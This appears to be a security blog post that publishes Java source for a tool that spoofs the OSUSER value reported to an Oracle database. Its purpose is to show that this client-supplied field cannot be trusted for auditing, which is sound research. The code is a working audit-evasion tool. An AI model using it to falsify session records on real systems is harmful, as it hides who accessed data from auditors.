In my previous post I discussed using OSUSER for auditing user access. To spoof OSUSER I wrote a short program in Java, but I didn't publish the source code. I had been planning to do so for quite some time, especially since Pete Finnigan expressed interest in seeing it. Martin also hassled me for the past few months, so here is the Java code I used.
To compile it I used Java 1.6 and the Oracle JDBC 11.2.0.1 driver:

    javac -cp ../lib/ojdbc6.jar:. OraAccess.java
OraAccess.java source file:

    import java.io.Console;
    import java.sql.Connection;
    import java.sql.DriverManager;
    import java.sql.SQLException;
    import java.util.Properties;

    public class OraAccess {

        // Opens a thin-driver connection and overrides the OSUSER and PROGRAM
        // values that the client reports to the database (shown in V$SESSION).
        public static Connection getConnection(String db_address, String db_name,
                                               String db_username, String db_pass,
                                               String new_osuser) {
            Properties props = new Properties();
            props.put("user", db_username);
            props.put("password", db_pass);
            // Both values are supplied by the client; the server does not verify them.
            props.put("v$session.osuser", new_osuser);
            props.put("v$session.program", "UserSpoofTest");

            Connection con = null;
            try {
                // db_address is "IP:port", so the URL becomes host:port:name.
                con = DriverManager.getConnection(
                        "jdbc:oracle:thin:@" + db_address + ":" + db_name, props);
            } catch (SQLException ex) {
                System.err.println("SQLException: " + ex.getMessage());
            }
            return con;
        }

        public static void main(String[] args) throws SQLException {
            Console c = System.console();
            if (c == null) {
                System.err.println("No console.");
                System.exit(1);
            }

            // Show the real operating system user for comparison.
            String username = System.getProperty("user.name");
            System.out.println("Your current operating system username is: " + username);

            String database_address = c.readLine("Enter database server IP and port number (IP:port): ");
            String database_name = c.readLine("Enter database name: ");
            String db_username = c.readLine("Enter database username: ");
            // readPassword keeps the password from being echoed to the terminal.
            String db_password = new String(
                    c.readPassword("Enter password for user \"%s\": ", db_username));
            String fake_osuser = c.readLine("Enter fake osuser name: ");

            Connection conn = getConnection(database_address, database_name,
                                            db_username, db_password, fake_osuser);
            // getConnection returns null when the connection attempt failed.
            if (conn == null) {
                System.exit(1);
            }

            // Keep the session open so it can be inspected in V$SESSION.
            c.readLine("Enter something to disconnect.");
            conn.close();
        }
    }
